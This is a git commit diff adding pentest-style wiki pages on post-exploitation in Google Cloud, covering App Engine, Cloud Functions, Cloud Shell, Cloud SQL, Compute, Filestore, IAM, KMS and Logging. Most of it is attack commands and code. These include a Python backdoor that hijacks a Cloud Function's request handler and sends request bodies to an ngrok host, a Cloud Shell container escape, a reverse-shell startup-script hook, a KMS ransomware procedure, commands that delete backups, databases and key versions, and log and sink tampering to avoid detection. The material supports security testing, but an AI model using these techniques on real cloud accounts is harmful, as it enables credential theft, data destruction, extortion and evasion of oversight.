Migrate to using mdbook

This commit is contained in:
Congon4tor
2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions

View File

@@ -0,0 +1,2 @@
# GCP - Post Exploitation

View File

@@ -0,0 +1,43 @@
# GCP - App Engine Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## App Engine
For information about App Engine check:
{{#ref}}
../gcp-services/gcp-app-engine-enum.md
{{#endref}}
### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
With these permissions it's possible to:
- Add a key
- List keys
- Get a key
- Flush (delete) keys
> [!CAUTION]
> However, I **couldn't find any way to access this information from the CLI**, only from the **web console** (where you need to know the **key type** and the **key name**) or from the **running App Engine app**.
>
> If you know easier ways to use these permissions send a Pull Request!
### `logging.views.access`
With this permission it's possible to **see the logs of the App**:
```bash
gcloud app logs tail -s <name>
```
### Read Source Code
The source code of all the versions and services is **stored in the bucket** named **`staging.<proj-id>.appspot.com`**. If you have read access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
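A minimal sketch to grab the code (assuming read access over that bucket; the project ID is a placeholder):
```bash
# List the App Engine staging bucket and download everything to hunt for secrets
gcloud storage ls gs://staging.<proj-id>.appspot.com/
gcloud storage cp -r gs://staging.<proj-id>.appspot.com/ /tmp/appengine-src/
```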
### Modify Source Code
Modify the source code to steal credentials if they are being sent, or to perform a web defacement attack.
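A possible sketch (assuming the sources downloaded from the staging bucket include a deployable `app.yaml` and that you hold deploy permissions; paths are placeholders):
```bash
# Download the current sources, backdoor them, then redeploy a new version
gcloud storage cp -r gs://staging.<proj-id>.appspot.com/ /tmp/app/
# ... edit /tmp/app to exfiltrate submitted credentials or deface the site ...
gcloud app deploy /tmp/app/app.yaml --project <proj-id> --quiet
```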
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,21 @@
# GCP - Artifact Registry Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Artifact Registry
For more information about Artifact Registry check:
{{#ref}}
../gcp-services/gcp-artifact-registry-enum.md
{{#endref}}
### Privesc
The post exploitation and privesc techniques of Artifact Registry are covered together in:
{{#ref}}
../gcp-privilege-escalation/gcp-artifact-registry-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,29 @@
# GCP - Cloud Build Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Build
For more information about Cloud Build check:
{{#ref}}
../gcp-services/gcp-cloud-build-enum.md
{{#endref}}
### `cloudbuild.builds.approve`
With this permission you can approve the execution of a **Cloud Build that requires approval**.
```bash
# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{
  "approvalResult": {
    "decision": "APPROVED"
  }
}' \
"https://cloudbuild.googleapis.com/v1/projects/<PROJECT_ID>/locations/<LOCATION>/builds/<BUILD_ID>:approve"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,128 @@
# GCP - Cloud Functions Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Functions
Find some information about Cloud Functions in:
{{#ref}}
../gcp-services/gcp-cloud-functions-enum.md
{{#endref}}
### `cloudfunctions.functions.sourceCodeGet`
With this permission you can get a **signed URL to download the source code** of the Cloud Function:
```bash
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'
```
### Steal Cloud Function Requests
If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
Moreover, Cloud Functions written in Python use **flask** to expose the web server, so if you somehow find a code injection vulnerability inside the flask process (an SSTI vulnerability, for example), it's possible to **override the function handler** that receives the HTTP requests with a **malicious function** that **exfiltrates the request** before passing it to the legit handler.
For example, this code implements the attack:
```python
import functions_framework
# Some python handler code
@functions_framework.http
def hello_http(request, last=False, error=""):
"""HTTP Cloud Function.
Args:
request (flask.Request): The request object.
<https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data>
Returns:
The response text, or any set of values that can be turned into a
Response object using `make_response`
<https://flask.palletsprojects.com/en/1.1.x/api/#flask.make_response>.
"""
if not last:
return injection()
else:
if error:
return error
else:
return "Hello World!"
# Attacker code to inject
# Code based on the one from https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py
new_function = """
def exfiltrate(request):
try:
from urllib import request as urllib_request
req = urllib_request.Request("https://8b01-81-33-67-85.ngrok-free.app", data=bytes(str(request._get_current_object().get_data()), "utf-8"), method="POST")
urllib_request.urlopen(req, timeout=0.1)
except Exception as e:
if not "read operation timed out" in str(e):
return str(e)
return ""
def new_http_view_func_wrapper(function, request):
def view_func(path):
try:
error = exfiltrate(request)
return function(request._get_current_object(), last=True, error=error)
except Exception as e:
return str(e)
return view_func
"""
def injection():
global new_function
try:
from flask import current_app as app
import flask
import os
import importlib
import sys
if os.access('/tmp', os.W_OK):
new_function_path = "/tmp/function.py"
with open(new_function_path, "w") as f:
f.write(new_function)
os.chmod(new_function_path, 0o777)
if not os.path.exists('/tmp/function.py'):
return "/tmp/function.py doesn't exists"
# Get relevant function names
handler_fname = os.environ.get("FUNCTION_TARGET") # Cloud Function env variable indicating the name of the function that handles requests
source_path = os.environ.get("FUNCTION_SOURCE", "./main.py") # Path to the source file of the Cloud Function (./main.py by default)
realpath = os.path.realpath(source_path) # Get full path
# Get the modules representations
spec_handler = importlib.util.spec_from_file_location("main_handler", realpath)
module_handler = importlib.util.module_from_spec(spec_handler)
spec_backdoor = importlib.util.spec_from_file_location('backdoor', '/tmp/function.py')
module_backdoor = importlib.util.module_from_spec(spec_backdoor)
# Load the modules inside the app context
with app.app_context():
spec_handler.loader.exec_module(module_handler)
spec_backdoor.loader.exec_module(module_backdoor)
# Make the cloud function use the new function as handler
prev_handler = getattr(module_handler, handler_fname)
new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper')
app.view_functions["run"] = new_func_wrap(prev_handler, flask.request)
return "Injection completed!"
except Exception as e:
return str(e)
```

View File

@@ -0,0 +1,23 @@
# GCP - Cloud Run Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Run
For more information about Cloud Run check:
{{#ref}}
../gcp-services/gcp-cloud-run-enum.md
{{#endref}}
### Access the images
If you can access the container images, check the code for vulnerabilities and hardcoded sensitive information, and also check the env variables for sensitive information.
If the images are stored in repos inside the Artifact Registry service and the user has read access over the repos, they could also download the image from this service.
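For example, a sketch to locate and pull a service's image (service, region and image path are placeholders):
```bash
# Find the image the Cloud Run service is running
gcloud run services describe <service> --region <region> --format 'value(spec.template.spec.containers[0].image)'
# Authenticate docker against Artifact Registry and pull the image
gcloud auth configure-docker <region>-docker.pkg.dev
docker pull <region>-docker.pkg.dev/<project>/<repo>/<image>:<tag>
```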
### Modify & redeploy the image
Modify the Cloud Run image to steal information and redeploy a new version (just uploading a new Docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
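A sketch of the redeploy (assuming push access over the repo; names are placeholders):
```bash
# Push the backdoored image and deploy a new revision pointing to it
docker push <region>-docker.pkg.dev/<project>/<repo>/<image>:backdoored
gcloud run deploy <service> --region <region> --image <region>-docker.pkg.dev/<project>/<repo>/<image>:backdoored
```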
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,102 @@
# GCP - Cloud Shell Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Shell
For more information about Cloud Shell check:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}
### Container Escape
Note that Google Cloud Shell runs inside a container; you can **easily escape to the host** by doing:
```bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
```
This is not considered a vulnerability by Google, but it gives you a wider view of what is happening in that environment.
Moreover, notice that from the host you can find a service account token:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
With the following scopes:
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
Enumerate metadata with LinPEAS:
```bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
```
After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the service account, **no permissions were discovered**...
### Use it as Proxy
If you want to use your Google Cloud Shell instance as a proxy you need to run the following commands (or insert them in the .bashrc file):
```bash
sudo apt install -y squid
```
For reference, Squid is an HTTP proxy server. Create a **squid.conf** file with the following settings:
```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
```
Copy the **squid.conf** file to **/etc/squid/**:
```bash
sudo cp squid.conf /etc/squid
```
Finally run the squid service:
```bash
sudo service squid start
```
Use ngrok to let the proxy be available from outside:
```bash
./ngrok tcp 3128
```
Once ngrok is running, copy the tcp:// URL. To use the proxy from a browser, remove the tcp:// prefix, use the host in the address field and the port in the port field of your browser's proxy settings (Squid is an HTTP proxy server).
To have this available at startup, the .bashrc file should contain the following lines:
```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128
```
The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,103 @@
# GCP - Cloud SQL Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud SQL
For more information about Cloud SQL check:
{{#ref}}
../gcp-services/gcp-cloud-sql-enum.md
{{#endref}}
### `cloudsql.instances.update` (`cloudsql.instances.get`)
To connect to the databases you **just need access to the database port** and to know the **username** and **password**; there aren't any IAM requirements. So, supposing the database has a public IP address, an easy way to get access is to update the allowed networks and **allow your own IP address to access it**.
```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet
mysql -h <ip_db> # If mysql
# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect <instance-name> --user=root --quiet
```
It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
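For instance (a sketch reusing the same `patch` subcommand, assuming the instance name is in `$INSTANCE_NAME`):
```bash
# Disable daily backups of the instance
gcloud sql instances patch $INSTANCE_NAME --no-backup --quiet
```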
As these are the requirements, I'm not completely sure what the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** are for. If you know, send a PR!
### `cloudsql.users.list`
Get a **list of all the users** of the database:
```bash
gcloud sql users list --instance <instance-name>
```
### `cloudsql.users.create`
This permission allows you to **create a new user inside** the database:
```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```
### `cloudsql.users.update`
This permission allows you to **update a user inside** the database. For example, you could change their password:
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
Backups might contain **old sensitive information**, so it's interesting to check them.\
**Restore a backup** inside a database:
```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```
To do it in a stealthier way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
### `cloudsql.backupRuns.delete`
This permission allows deleting backups:
```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```
### `cloudsql.instances.export`, `storage.objects.create`
**Export a database** to a Cloud Storage Bucket so you can access it from there:
```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```
### `cloudsql.instances.import`, `storage.objects.get`
**Import a database** (overwrite) from a Cloud Storage Bucket:
```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```
### `cloudsql.databases.delete`
Delete a database from the db instance:
```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,120 @@
# GCP - Compute Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Compute
For more information about Compute and VPC (Networking) check:
{{#ref}}
../gcp-services/gcp-compute-instances-enum/
{{#endref}}
### Export & Inspect Images locally
This would allow an attacker to **access the data contained inside already existing images** or **create new images of running VMs** and access their data without having access to the running VM.
It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
```bash
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally
```
To perform this action the attacker might need privileges over the storage bucket and will definitely need **privileges over Cloud Build**, as it's the **service** that is going to be asked to perform the export.\
Moreover, for this to work the Cloud Build SA and the compute SA need privileged permissions.\
The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
- roles/iam.serviceAccountTokenCreator
- roles/compute.admin
- roles/iam.serviceAccountUser
And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
- roles/compute.storageAdmin
- roles/storage.objectAdmin
### Export & Inspect Snapshots & Disks locally
It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot into a disk and a disk into an image**, and, following the **previous section**, export that image to inspect it locally:
```bash
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
```
### Inspect an Image creating a VM
With the goal of accessing the **data stored in an image**, or inside a **running VM** from which an attacker **has created an image**, it's possible to grant an external account access over the image:
```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
```
and then create a new VM from it:
```bash
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```
If you cannot give your external account access over the image, you can launch a VM using that image in the victim's project and **make the metadata execute a reverse shell** to access the image, adding the param:
```bash
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
```
### Inspect a Snapshot/Disk attaching it to a VM
With the goal of accessing the **data stored in a disk or a snapshot**, you could transform the snapshot into a disk, a disk into an image, and follow the previous steps.
Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
```bash
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
```
**Attach the disk** to an instance:
```bash
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
```
Mount the disk inside the VM:
1. **SSH into the VM**:
```sh
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
```
2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
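For example (a minimal sketch):
```sh
# List block devices; the one without a mount point is usually the newly attached disk
sudo lsblk -o NAME,SIZE,TYPE,MOUNTPOINT
```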
3. **Format and Mount the Disk** (if it's a new or raw disk):
- Create a mount point:
```sh
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
- Mount the disk:
```sh
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```
If you **cannot give access to an external project** to the snapshot or disk, you might need to **perform these actions inside an instance in the same project as the snapshot/disk**.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,100 @@
# GCP - Filestore Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Filestore
For more information about Filestore check:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Mount Filestore
A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
```bash
sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
```
To find the IP address of a Filestore instance check the enumeration section of the page:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Remove Restrictions and get extra permissions
If the attacker isn't coming from an IP address with access over the share but has enough permissions to modify it, it's possible to remove the restrictions. It's also possible to grant more privileges to your IP address to get admin access over the share:
```bash
gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json
# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}
```
### Restore a backup
If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29
# Restore a backup in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>
# Follow the previous section commands to mount it
```
### Create a backup and restore it
If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
```bash
# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>
# Follow the previous section commands to restore it and mount it
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,29 @@
# GCP - IAM Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## IAM <a href="#service-account-impersonation" id="service-account-impersonation"></a>
You can find further information about IAM in:
{{#ref}}
../gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a role above Editor.
You can use the following command to **grant a user the primitive role of Editor** to your existing project:
```bash
gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
```
If you succeeded here, try **accessing the web interface** and exploring from there.
This is the **highest level you can assign using the gcloud tool**.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,257 @@
# GCP - KMS Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## KMS
Find basic information about KMS in:
{{#ref}}
../gcp-services/gcp-kms-enum.md
{{#endref}}
### `cloudkms.cryptoKeyVersions.destroy`
An attacker with this permission could destroy a KMS key version. In order to do this you first need to disable the key version and then destroy it:
```python
# pip install google-cloud-kms
from google.cloud import kms
def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Disables a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to disable the key version.
client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})
def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Destroys a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to destroy the key version.
client.destroy_crypto_key_version(request={'name': key_version_name})
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1' # Version number to disable and destroy
# Disable the key version
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
# Destroy the key version
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
```
### KMS Ransomware
In AWS it's possible to completely **steal a KMS key** by modifying the KMS resource policy and only allowing the attacker's account to use the key. As these resource policies don't exist in GCP, this is not possible.
However, there is another way to perform a global KMS Ransomware, which would involve the following steps:
- Create a new **version of the key with a key material** imported by the attacker
```bash
gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL]
```
- Set it as **default version** (for future data being encrypted)
- **Re-encrypt older data** encrypted with the previous version with the new one.
- **Delete the KMS key**
- Now only the attacker, who has the original key material, will be able to decrypt the encrypted data
#### Here are the steps to import a new version and disable/destroy the older version:
```bash
# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
gcloud kms encrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--plaintext-file my-plaintext-file.txt \
--ciphertext-file my-encrypted-file.enc
# Decrypt it
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Create an Import Job
gcloud kms import-jobs create my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--import-method "rsa-oaep-3072-sha1-aes-256" \
--protection-level "software"
# Generate key material
openssl rand -out my-key-material.bin 32
# Import the key material (it's encrypted with an asymmetric key of the import job before being sent)
gcloud kms keys versions import \
--import-job my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--algorithm "google-symmetric-encryption" \
--target-key-file my-key-material.bin
# Get versions
gcloud kms keys versions list \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key
# Make new version primary
gcloud kms keys update \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--primary-version 2
# Try to decrypt again (error)
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Disable initial version
gcloud kms keys versions disable 1 \
  --location us-central1 \
  --keyring kms-lab-2-keyring \
  --key kms-lab-2-key
# Destroy the old version
gcloud kms keys versions destroy 1 \
  --location us-central1 \
  --keyring kms-lab-2-keyring \
  --key kms-lab-2-key
```
### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
```python
from google.cloud import kms
import base64
def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
"""
Encrypts data using a symmetric key from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key name.
key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)
# Convert the plaintext to bytes.
plaintext_bytes = plaintext.encode('utf-8')
# Call the API.
encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
ciphertext = encrypt_response.ciphertext
# Optional: Encode the ciphertext to base64 for easier handling.
return base64.b64encode(ciphertext)
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'
ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)
```
### `cloudkms.cryptoKeyVersions.useToSign`
```python
import hashlib
from google.cloud import kms
def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
"""
Sign a message using an asymmetric key version from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}
# Call the API to sign the digest.
sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)
return sign_response.signature
# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'
signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)
```
### `cloudkms.cryptoKeyVersions.useToVerify`
```python
from google.cloud import kms

def verify_mac(project_id, location_id, key_ring_id, key_id, key_version, data, mac):
    """
    Verify a MAC using an HMAC key version from Cloud KMS.
    Note: Cloud KMS exposes no server-side verify API for asymmetric keys
    (those signatures are verified locally with the downloaded public key);
    this permission is used by the MacVerify API.
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()
    # Build the key version name.
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
    # Call the API to verify the MAC over the data.
    verify_response = client.mac_verify(request={'name': key_version_name, 'data': data, 'mac': mac})
    return verify_response.success

# Example usage for verification (data and mac are bytes; mac would come from a previous MacSign call)
verified = verify_mac(project_id, location_id, key_ring_id, key_id, key_version, b'your-data', mac)
print('Verified:', verified)
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,133 @@
# GCP - Logging Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
For more information check:
{{#ref}}
../gcp-services/gcp-logging-enum.md
{{#endref}}
For other ways to disrupt monitoring check:
{{#ref}}
gcp-monitoring-post-exploitation.md
{{#endref}}
### Default Logging
**By default you won't get caught just for performing read actions. For more info check the Logging Enum section.**
### Add Excepted Principal
In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) it's possible to add principals that should not generate logs. An attacker could abuse this to avoid being caught.
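The same exemptions can presumably also be set from the CLI by editing the `auditConfigs` section of the project IAM policy (a sketch, assuming `resourcemanager.projects.setIamPolicy`; the account is a placeholder):
```bash
gcloud projects get-iam-policy <project-id> --format json > policy.json
# Add an exemption like the following to policy.json before re-applying it:
# "auditConfigs": [{
#   "service": "allServices",
#   "auditLogConfigs": [{"logType": "DATA_READ", "exemptedMembers": ["user:attacker@gmail.com"]}]
# }]
gcloud projects set-iam-policy <project-id> policy.json
```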
### Read logs - `logging.logEntries.list`
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
```
### `logging.logs.delete`
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
### Write logs - `logging.logEntries.create`
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
### `logging.buckets.update`
```bash
# Set retention period to 1 day (_Required has a fixed one of 400 days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
```
### `logging.buckets.delete`
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
### `logging.links.delete`
```bash
# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>
```
### `logging.views.delete`
```bash
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global
```
### `logging.views.update`
```bash
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
```
### `logging.logMetrics.update`
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
### `logging.logMetrics.delete`
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
```
### `logging.sinks.delete`
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
```
### `logging.sinks.update`
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
# Create a filter to exclude the attacker's logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"
# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination
# Change the service account to one without permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
# Remove exclusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions
